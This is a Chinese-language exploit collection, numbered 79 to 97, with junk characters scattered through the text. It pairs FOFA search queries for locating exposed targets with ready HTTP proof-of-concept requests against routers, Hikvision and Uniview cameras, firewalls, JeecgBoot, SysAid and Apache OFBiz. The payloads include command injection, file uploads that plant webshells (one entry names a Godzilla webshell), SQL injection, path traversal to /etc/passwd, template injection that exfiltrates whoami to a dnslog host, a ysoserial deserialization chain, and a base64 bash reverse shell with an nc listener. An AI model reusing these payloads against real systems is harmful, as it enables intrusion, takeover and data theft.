Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
2 o  [( s1 F4 [7 r( h  u* }
% ?: K% @# `* U7 N/ M- X/ C, q% Y------YsOxWxSvj1KyZow1PTsh98fdu6l* A( _2 x* D& @3 t1 i
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
+ K: c5 Y/ S# q; r1 CContent-Type: image/png
& A& X; ?" ?, d& Z. E
4 U* j3 E' |2 ?; {8 e& ]YsOxWxSvj1KyZow1PTsh98fdu6l" b/ V5 D) K; b1 Z
------YsOxWxSvj1KyZow1PTsh98fdu6l) v* k8 _' u3 f1 ^; o
Content-Disposition: form-data; name="target"
0 S9 `& `5 h! B( w# g1 ]' r$ p: U3 [; Z7 u
/Applications/SkillDevelopAndEHS/9 @4 c2 X6 [2 j0 k# J
------YsOxWxSvj1KyZow1PTsh98fdu6l--
8 M% T3 R  p+ \! X
$ v+ K. @& J( K( x4 ~7 T' C
" H6 H7 Y: l8 c& bGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1, k$ s7 N& W, n  M6 ?. ~6 C2 R
Host: x.x.x.x1 m" c' C. z7 x; Q$ s. N

/ s- a) O' E" w1 j7 `( C; N  X6 }7 w) ~" b7 J) M
79. BYTEVALUE 百为流控路由器远程命令执行7 x: ^  c1 M( {2 X% o- `
FOFA:BYTEVALUE 智能流控路由器4 E! ^; `: v4 m. F+ Y5 @
GET /goform/webRead/open/?path=|id HTTP/1.1% q7 q9 X# k0 M- l
Host:IP
6 j' ]- I. j) D0 |/ E0 A0 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0% i  D  l9 j+ k# {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- D9 u( Q- ?, h" h& g; |- D( |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, c! Z+ T  H3 j4 q% l
Accept-Encoding: gzip, deflate
/ s4 A  c% P6 GConnection: close: A3 Z8 }6 C4 ~5 e
Upgrade-Insecure-Requests: 1
! O6 [5 ?% I- F( k; q2 c0 v2 w5 o" h

$ v$ R6 x- G8 S; J- ^$ a80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传9 V) c- v! Q3 J2 ?
FOFA:app="速达软件-公司产品"
/ G4 U# h, d8 k0 A$ V6 P# h) xPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1. M  `. x- M/ [1 M! m4 t
Host: x.x.x.x
+ c/ v( B- T) ?% ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 P" h6 ^6 i$ A0 J1 P- tContent-Length: 27. P8 `5 l+ g% X! m4 H* I" y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 @* D* l9 Z5 Q& ^1 k
Accept-Encoding: gzip, deflate7 G5 p; ]( G" r" }0 v- p* H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* H: v0 h! b" k+ {
Connection: close
3 K8 V) w1 b' ?4 Y* J/ \3 c! HContent-Type: application/octet-stream! M! L2 n- W2 E' ~9 \! T
Upgrade-Insecure-Requests: 13 X- a0 C& x; F$ R6 L- v

1 \$ c. P+ b# M<% out.print("oessqeonylzaf");%>
7 n7 o& X+ v( ~* q0 E2 N% {
8 q9 e/ }+ a& n, o% r& a2 J4 T" B  N) y& X6 z- i: p& j
GET /xykqmfxpoas.jsp HTTP/1.1+ {, n( N' C( x" w
Host: x.x.x.x
  i+ N9 q1 [# H2 L$ n# dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ g3 o' F3 R  T3 d5 G* \7 FConnection: close8 T2 m% g8 Q8 ^' `
Accept-Encoding: gzip
: h/ `  L- h' q! @: T2 p
) a. j$ J! T3 `  Z( l4 y$ i
! Q8 E) {+ F/ o: C: p1 x0 M81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
4 D$ ?8 N4 P! I  [FOFA:app="uniview-视频监控"% X; Z2 C1 P: T% M7 c' C7 E7 J
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1; M0 f3 w5 }7 S: X; i- K) @
Host: x.x.x.x  C4 @; {5 |& T
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: g8 J  M; I$ JConnection: close
$ {* S8 R7 D4 K* N' w6 JAccept-Encoding: gzip
& e9 E; c4 ?$ v# i0 x( I9 z
" u9 j/ M6 w" C
/ {) _8 C( ?6 N" y1 j82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行5 v3 w+ v3 e9 w, D, s+ N
FOFA:app="思福迪-LOGBASE"
' a$ c7 [9 _/ o+ g1 E0 T3 @* U5 dPOST /bhost/test_qrcode_b HTTP/1.1
, F. k, `, s8 d$ l+ `Host: BaseURL6 u: D6 H+ @" c* l) l$ i, s
User-Agent: Go-http-client/1.1
7 r/ ^4 o4 v( e, Z# ~Content-Length: 23
$ B9 [. O$ F( ?Accept-Encoding: gzip
8 Q% s4 ]$ S$ K" }4 I' U, n+ U' u( uConnection: close
  I" q4 C& t/ Y9 R% Y. l2 P5 \Content-Type: application/x-www-form-urlencoded
; M8 l# A  O+ g( O) ^" hReferer: BaseURL
$ O  T* H3 X/ o+ G$ T0 t! E9 Z% u; v! M% a0 {9 r4 A
z1=1&z2="|id;"&z3=bhost# V, G1 a9 R2 |4 o! h/ k
  U" r. A7 c9 M6 [( N3 d) U* m

) F, o% P! b4 N, I* d83. JeecgBoot testConnection 远程命令执行0 Q% G! }2 Z5 p! K
FOFA:title=="JeecgBoot 企业级低代码平台"
1 j3 O( a7 X7 v& x3 _( f0 g% |- h- ?7 `5 D: e
2 e" @. w5 @& [" W% T; ]# N4 x
POST /jmreport/testConnection HTTP/1.1
, R% T3 `6 P' h4 N2 ]Host: x.x.x.x
; u& H" G6 ^% ^7 a/ L/ hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ ], g2 y, R! |, p& C
Connection: close
+ k" Q2 ~9 |& I) J1 X/ jContent-Length: 88812 ]& n, a7 r2 @: {+ q, B
Accept-Encoding: gzip
2 i: i" m% J- W  m- c! mCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"7 G6 X) f3 [6 q- \
Content-Type: application/json
  h6 k9 c, ^, C8 Q. d! a0 {; z- S
6 [; @; i4 w& c5 t* Z/ f4 lPAYLOAD
) n$ _& V- o- ~! B: v3 n
& ]  X( [+ |* G4 s6 T" ~; R84. Jeecg-Boot JimuReport queryFieldBySql 模板注入9 m/ s& H# Z* c9 r; l0 \. Q
FOFA:title=="JeecgBoot 企业级低代码平台"# A2 Q; s0 X$ k0 V  ^
0 Z2 Q/ @2 b$ P+ T* q
+ L1 C& |5 ~7 A; G, k8 X: b
0 R  K1 T  O/ |2 v* I+ _+ I* b6 E3 X: F
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
, X# R3 ~: S% t& IHost: 192.168.40.130:8080' U; X; |! C! _) V
User-Agent: curl/7.88.10 y& U0 }. X! x, i5 r
Content-Length: 156
' ]3 J+ \5 V' V9 y" R" OAccept: */*7 }8 e' f+ ^7 R# Z
Connection: close' B% Q! ?! r6 R+ b, c
Content-Type: application/json
9 L! m8 r  w8 l, X0 cAccept-Encoding: gzip
( G4 I1 X2 ~$ R/ U) e- w0 T+ J$ q" h( K0 a
{
) ]: N7 l5 t  Y "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
- ]% ^% d, G6 m& w5 w, K0 Y" N1 S  "type": "0"4 U) c  G0 W, A, g9 d, ^$ c
}, t) n! ^7 n0 N1 M  |
0 g7 r' y2 t% {" G; m
8 v9 @# ^( \3 s( M' f! Q. }
85. SysAid On-premise< 23.3.36远程代码执行
- R2 A9 j) v" oCVE-2023-472460 Q# h0 A/ f1 h# z. E$ R
FOFA:body="sysaid-logo-dark-green.png"
7 ~/ K( V7 c8 U, _' LEXP数据包如下,注入哥斯拉马! T7 c1 K5 G$ x9 e" l- M5 H
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1* _% ^4 g% O. j: Y
Host: x.x.x.x
/ B* p1 {. J, ]' R9 j9 F0 C5 oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" o3 D4 F3 B: T! w1 u. H- f2 f: FContent-Type: application/octet-stream- t* _0 A9 B3 M" H
Accept-Encoding: gzip
/ I5 u; v" L3 ?$ A- g  I5 f5 F0 w8 J/ \
PAYLOAD
3 h/ R! x5 Y& v2 z  ]
4 k! y! F* ^% A回显URL:http://x.x.x.x/userfiles/index.jsp
9 u( h7 x$ R! c9 e/ Q1 ~
" F/ x% t: x8 |" b86. 日本tosei自助洗衣机RCE. g& ~9 d- I" f3 I) C9 n
FOFA:body="tosei_login_check.php", w1 B; C5 y. o' b7 R! N$ d$ S
POST /cgi-bin/network_test.php HTTP/1.1$ a; v3 n7 p7 U5 f8 ]( w, L) b
Host: x.x.x.x
* ^# g3 C% A- _: ~, z3 I3 U9 aUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.363 t. w3 K: C7 Q* E& N! f: [
Connection: close
# m# g7 L: \& k' p$ r3 N2 PContent-Length: 44) y7 p' E3 z6 P
Accept: */*
. d# u0 \# K9 }; SAccept-Encoding: gzip
; @& I0 a. p2 f, w' ~Accept-Language: en
' V" T* X5 a' t. _Content-Type: application/x-www-form-urlencoded/ O& j5 r/ ~% o; @

: U6 ]# _2 `7 m: m+ _host=%0acat${IFS}/etc/passwd%0a&command=ping
3 m, f2 d7 w+ F6 b
4 _. @  m% c! G8 e0 H- Q! Q3 C  e! V4 m
87. 安恒明御安全网关aaa_local_web_preview文件上传
2 v1 M" P/ d% _3 c  IFOFA:title="明御安全网关"
) s0 y4 c+ M& E5 L! ~0 R& DPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1) s! v4 f5 l8 v: I& F0 `
Host: X.X.X.X1 s) Z- J. M0 p: u* T/ D4 i1 E. @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' c; ^, U0 q* M( l& O0 e* |- Q0 JConnection: close2 a0 l4 c5 V3 n* o: u7 p' ~3 p
Content-Length: 198+ a. L! ?/ T6 f9 e4 M5 z
Accept-Encoding: gzip' ]; D( p& M+ C7 E9 |9 q- x& W
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
6 Q; w& T0 L0 P( E+ r
( E. U/ Z$ L& I; U2 x--qqobiandqgawlxodfiisporjwravxtvd- Y& R- l4 K7 h' V8 n/ `; g) X
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"1 _6 n& J" v5 s( l" j) q( z* l' c" m
Content-Type: text/plain0 M7 ]8 w* o+ u9 c7 T2 l. e* M
% u2 q% K7 \8 }/ M( E
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
: f# v& e& @0 q. U: `4 O--qqobiandqgawlxodfiisporjwravxtvd--/ h: i' z# L. l, J( Y

- @  I* X) k  O$ c- t+ x- Z
2 ~( o7 F" h6 Z( h# K/ v* W/jfhatuwe.php
6 J4 z2 Z/ Z- I) S: j$ H
' q" x6 h% o( }3 p) N& e9 }; v/ a  g88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行. e2 c  |2 _; N
FOFA:title="明御安全网关", p0 S  Q# w  c
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
% J, k& R" m" ~Host: x.x.x.xx.x.x.x$ j. a- u$ @! {( J! w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 f- u( H8 D; L) r+ b) H- c0 E* ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( f2 o: ?6 p" l: u
Accept-Encoding: gzip, deflate5 e" r* Y" I/ r: G2 t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 F- r/ m4 X  T( m! LConnection: close
9 g6 [6 ^. M, O" ^+ M
$ S2 F5 q: q6 i! u: u) X  _5 W9 l
* Q; s& }, o8 ?7 J9 S/astdfkhl.php
8 ^/ z! U9 z& }! N) ~6 R) C2 a4 C3 c" `: J* b: ~, B# u* }' r: f  c
89. 致远互联FE协作办公平台editflow_manager存在sql注入
2 p! j: k$ m9 K( O: l1 H( cFOFA:title="FE协作办公平台" || body="li_plugins_download") {$ ^5 v3 Y6 W; R
POST /sysform/003/editflow_manager.js%70 HTTP/1.18 z3 G! h. r" h% e
Host: x.x.x.x7 s+ A' x- P. |" `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 g1 r/ U/ }( q$ ?6 y. n9 D
Connection: close
6 o4 U" A# F  S8 U5 [6 R2 }0 w$ sContent-Length: 41' l8 g, p5 P/ x
Content-Type: application/x-www-form-urlencoded
5 W) k2 Q6 p/ F- B' U. ]% [6 lAccept-Encoding: gzip
( C. P# P$ F+ q# i: c- m4 ~4 T% }4 x) A# u& h; ]+ y$ ?, L
option=2&GUID=-1'+union+select+111*222--+# k; m4 \9 m' U$ t" d5 W& ^

4 {( _6 M% a3 w% D0 c) m/ F0 A3 _+ o) V% t& p0 e+ i
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行7 v' @. Z/ m( ]% z7 \' L0 Z; g# k
FOFA:icon_hash="-1830859634"
- _/ a+ J- r) g) f/ \POST /php/ping.php HTTP/1.1
1 m% \( T4 K  yHost: x.x.x.x7 m9 S# }9 i) D& X7 L, P% J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.09 u" Y  g+ C3 E& R9 L5 z& `
Content-Length: 518 p$ f: w0 C3 p! m) B. \
Accept: application/json, text/javascript, */*; q=0.01+ g, B, b7 h6 Z4 R. u
Accept-Encoding: gzip, deflate4 z# f2 y1 P$ @& ?$ |# K) \. E0 H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, \- O3 T6 l, b* j. U/ h
Connection: close
) s5 u! l+ d# D1 M! w. R  g( ^Content-Type: application/x-www-form-urlencoded( ~3 W, L9 L" }. f' N1 k
X-Requested-With: XMLHttpRequest
, X9 s: }1 |6 y, i0 w/ y+ o$ m$ d8 O; S& [/ W' ^; e( Y
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
; b' b. j8 J& M3 U: @6 {" X) C5 P! i+ m9 X! N$ `2 Q, o( A& e1 e

, t4 t1 j; H; j4 a( q91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取7 }8 n$ l7 t/ z+ ?+ d
FOFA:title="综合安防管理平台"
; R9 |9 r8 ?/ r8 P6 pGET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
" Z- n. y; J7 }& C; sHost: your-ip
+ d5 ]1 p( Q6 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.365 L4 N3 z$ P( M0 n  z
Accept-Encoding: gzip, deflate
% j8 l7 q0 X' R: j1 R9 OAccept: */*+ s) k7 S2 {  q9 s8 U- r! W- ~
Connection: keep-alive
2 U: G2 Z1 t9 o6 j* @. N# B1 \* l% h8 z- M3 O
# T/ f7 ^; i) d4 J" z

7 G! S5 W6 o. U) a; F' D8 W9 O! F92. 海康威视运行管理中心session命令执行
$ a3 }0 }5 h! B" Y, t4 w: @Fastjson命令执行% f$ z% E" v( F2 L
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
* A; Q! K2 |" X: ]0 mPOST /center/api/session HTTP/1.1
* t0 W/ t( H: l/ DHost:
+ h; F  k" m' |& I* p% _1 m. rAccept: application/json, text/plain, */*
: a* H: B* r6 L) J4 ~, K% GAccept-Encoding: gzip, deflate- j7 ]& b" V7 Y, C1 ^) y* W
X-Requested-With: XMLHttpRequest* e2 |7 r2 y4 |6 C- B/ ~4 o
Content-Type: application/json;charset=UTF-8
  S, b8 c) q' S/ ]; p% b, H) QX-Language-Type: zh_CN
8 @  X5 m) z; d' P6 ~7 w# FTestcmd: echo test
- w5 J2 V* G/ F  G8 WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.364 l) d5 G* l6 V+ }2 `: a% w" V
Accept-Language: zh-CN,zh;q=0.9
% j: n* m6 i2 tContent-Length: 5778- M- ^$ }9 ?3 E0 H8 l
' f# |; M; f( {4 w& b2 e. J
PAYLOAD& C% x4 S+ r2 s6 ?  `5 k5 |% k" g1 N, `

% f- q1 M% F6 B5 W, A7 f6 @+ F9 W" M. R! o# F
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传" R7 J; ~( z9 [* `
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="7 m& r" a" p2 {
POST /?g=app_av_import_save HTTP/1.13 g, H4 {: p2 k" Z, O' h5 L" Y  Y
Host: x.x.x.x( N' x* h" E1 m
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
6 Y, `1 E- V  h# Z1 P  Z' OUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
2 e" h/ V, B% s, P. y3 R4 X1 s2 \
------WebKitFormBoundarykcbkgdfx
% f8 x+ ?8 D  W" kContent-Disposition: form-data; name="MAX_FILE_SIZE"
1 a' M6 L7 R( {! J/ b; i) g' X/ i+ ~# G/ ?( K8 F; ~9 H' q
10000000
, {5 [! `5 |5 V! M------WebKitFormBoundarykcbkgdfx
1 p9 m4 m9 k0 ]2 F# c3 eContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
" \7 O" d4 O  w2 q) X; f9 N$ qContent-Type: text/plain
- V( Y( K. |7 G! S! ]- w
1 h7 r' P4 \+ R9 |/ nwagletqrkwrddkthtulxsqrphulnknxa
0 q' Q: r' @! j! f6 A* k( y* R  D------WebKitFormBoundarykcbkgdfx
. d. P2 t' w; q% R% `* g' EContent-Disposition: form-data; name="submit_post"' t) s2 \# u7 `

+ S1 D% A/ E9 Fobj_app_upfile
( H0 I, t- a. ^9 Z------WebKitFormBoundarykcbkgdfx
" v9 N/ s  t# h1 X+ LContent-Disposition: form-data; name="__hash__"+ O# W! m5 [; a) B. E

% c1 R, i9 M4 B6 J! V( r# i! ~0b9d6b1ab7479ab69d9f71b05e0e94458 f- L. l$ f) a
------WebKitFormBoundarykcbkgdfx--
2 C6 I5 h2 q# [: l7 D$ l0 W2 N5 q4 U2 x: _$ Y3 V) ~/ s+ \
4 R) Q+ I% ^* M- a! T0 I$ q' z5 L1 l4 X
GET /attachements/xlskxknxa.txt HTTP/1.1
* r. Z/ b0 g  @; D/ ]( I/ Q, bHost: xx.xx.xx.xx
, I$ z/ F8 i+ ~# U- P* w4 _9 |User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' b6 w( x6 B# _5 l& i0 o2 p% f; H

6 A2 \$ `3 Q! M5 x) Q% Z1 i! S4 ]5 n" R4 Y
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
( A& X! m. a8 U8 VFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
9 z* S9 H% |. Y7 wPOST /?g=obj_area_import_save HTTP/1.1
6 U7 U( v9 f# i3 E& h3 FHost: x.x.x.x
5 p9 d! S5 E; h& K4 dContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
- T0 L- K5 |# L7 K& D: }( `3 l$ EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
- ~+ N& t$ F5 O' A! V* x* D+ t' X8 M
------WebKitFormBoundarybqvzqvmt
& ~* I7 m# P( J4 a- \0 i& _Content-Disposition: form-data; name="MAX_FILE_SIZE"
8 m7 T4 t+ l! f" {  y6 i7 x+ V, v* a
10000000" t/ ?: N  a* C8 ~3 G
------WebKitFormBoundarybqvzqvmt
* K/ s5 F! v. D. a* u5 uContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
- a) k+ l# r1 gContent-Type: text/plain% Y; [8 V5 ~  R, o/ _

: }2 `* l: O8 p+ v) U% U9 dpxplitttsrjnyoafavcajwkvhxindhmu
! R7 B0 c+ H' o2 s------WebKitFormBoundarybqvzqvmt
7 T- `4 [8 ^0 p6 l. x1 VContent-Disposition: form-data; name="submit_post"5 a5 w& I- t! Y

' C+ Q3 N- Q5 oobj_app_upfile/ p: u0 ?9 q  K! R
------WebKitFormBoundarybqvzqvmt
* D4 M# p1 i9 [0 ~) ^8 s8 ]* @3 \& jContent-Disposition: form-data; name="__hash__"' k( ~7 @- h/ O/ \! d3 v7 a
6 L4 H9 ]. r: Z6 |, O
0b9d6b1ab7479ab69d9f71b05e0e94452 n( }/ Y& L$ c' |" Q$ D) W6 D
------WebKitFormBoundarybqvzqvmt--
+ I3 A, D" @- M  x6 c' l( `! u. ]/ @2 k, v3 N8 Y
0 o& K8 h2 ]" M3 h4 c$ t6 f- c% q+ r

2 [) J# u; F6 Y# l( U: h# uGET /attachements/xlskxknxa.txt HTTP/1.1  u: Z/ c7 _2 C7 c( D
Host: xx.xx.xx.xx2 K( K$ ?. u4 Y! r, @/ v
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& g/ f! b$ h* X7 j6 g9 I: H' i% {& x: k5 J0 C7 q* g6 X# A( j
! O. r" b; q* B) K
) V+ n# N2 u& W4 Q7 x1 t
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
4 R8 D6 }5 a) M" |5 r) UCVE-2023-49070. w6 K' J7 _# p/ D' M$ A5 v& F  p
FOFA:app="Apache_OFBiz"
4 k  h7 Q* d5 R% l( |POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1! M' L4 S3 |2 N3 J' a6 n0 Q; W* G
Host: x.x.x.x
" t. p7 f+ v) z$ YUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
# y4 |1 v$ q. T& f$ t" \( ~- w" q7 i4 xConnection: close' U- _. {; b; G
Content-Length: 889
& V5 l& X9 W/ _: x- S( CContent-Type: application/xml9 F" X5 o1 Z7 w- s9 w5 \( F9 y
Accept-Encoding: gzip
; H& U7 _9 U& S5 a: u+ v: j: [2 i! Q" q9 z! B8 I" D
<?xml version="1.0"?>$ e" Z! C# }/ @) O
<methodCall>7 x9 }- \( P# X# l, r+ z+ x
   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>6 d4 b, K( {9 G$ ?$ C
    <params>8 d0 J/ i7 B; `6 c$ F8 b7 L& G/ q
      <param>$ I) L1 `) N& y, v3 H# T( X
      <value>- G, O2 k/ |  [0 B5 l
        <struct>2 T6 \5 f% D' d
       <member>! W$ c& [5 T! R- K2 a/ r
          <name>test</name>* ^3 K" R7 C: s  N6 s$ i$ p/ w
          <value>
' M: z6 w/ V; w3 S/ u      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>. J! C/ e  j) c# I
          </value>: Y5 `' o' R8 v5 l1 f3 k0 W, h8 D; r; u
        </member>
8 O, v$ V* x# b  b      </struct>
  W0 T6 U7 o7 H* j( W      </value>- n6 b- M/ H" I  W
    </param>
' M" V7 c. B0 ^6 J& G' J; P& ]; }2 r    </params>) K+ n; _  j$ ]+ b/ }$ B
</methodCall>- |: S4 g7 w/ Q4 G3 Y8 L; v

' J* w* ^. n3 t0 m4 J- v/ X5 m* b1 h+ d0 u8 K
用ysoserial生成payload
9 X8 ~7 \$ |: o; |+ W; Ojava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"/ S# C) u. |% `& {  p

, H# p! Z. ^3 w  [" b! ^
0 S  E7 A1 d# X" j# l5 z* Q将生成的payload替换到上面的POC
, i# X2 [0 J) f( _5 H9 KPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
' J8 y2 N3 T7 S! K9 N. |Host: 192.168.40.130:8443
# Q6 f- z& L( w5 E* _) GUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36- K: {: G/ F) `
Connection: close' c6 _. a$ q( Z) f$ k2 d7 N' u
Content-Length: 8897 I; ]0 s, g, w' L- Y, F7 w
Content-Type: application/xml5 P$ y& i' o+ i$ ^6 ^' |
Accept-Encoding: gzip) {$ P5 j+ K- X5 J

6 }/ g; g5 Y. Q& v1 jPAYLOAD
. W3 Q: {0 ^. {( W, a/ Q
2 q. S  y. T! [) Q7 [; b96. Apache OFBiz  18.12.11 groovy 远程代码执行
: h9 h4 ~0 |4 C* n9 EFOFA:app="Apache_OFBiz"
1 n, ^2 H2 h" z! ^# fPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.11 a6 y/ j+ U  H
Host: localhost:8443" s7 s) ~* ^% T+ E7 C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
4 S  C) V$ V: u0 u6 g+ LAccept: */*$ U/ q$ b2 K5 j) t
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
2 _, s! R4 `' Q" qContent-Type: application/x-www-form-urlencoded; {8 H$ Z* x) A$ z2 J
Content-Length: 55$ n. s5 ~( J: W8 w3 D

% _' A5 }( L  {9 O5 x- U# S4 }7 igroovyProgram=throw+new+Exception('id'.execute().text);
& y- t! N. f! w1 M! A/ O' A  C, `& K$ Y
5 E2 i7 ?- k8 k( ?& _: x
反弹shell
- m. M) w. e( {4 `! R6 `) v在kali上启动一个监听- ~9 J# u1 k( m
nc -lvp 7777
. L" D+ k& L+ Y4 n
4 `0 }# b$ R, M: ^6 zPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
! u0 j3 C% |  z6 MHost: 192.168.40.130:84430 Y1 d6 Q+ a: S- u& l0 `' @7 U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' c! s; R& i# G. i5 I
Accept: */*
* H' _' {; O( H$ YAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: w( R" p; P/ K& O
Content-Type: application/x-www-form-urlencoded
$ h3 Q0 U& c+ }, ?2 Z% ZContent-Length: 71
  p5 O) Z7 Z: O" S& f; C+ }
5 }8 }+ _0 f' IgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
/ K! r+ b3 S3 z2 _5 D" ?% k- D% O, W/ s% m4 ~
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行. @+ ^& r) G  N  Z& _2 |0 c
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
3 v; l/ c! `: F7 ]* [GET /passport/login/ HTTP/1.1
2 N) b4 L( N3 G& s& Y! |! |$ EHost: 192.168.40.130:8085" f; ]. ?, g' }* X/ S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
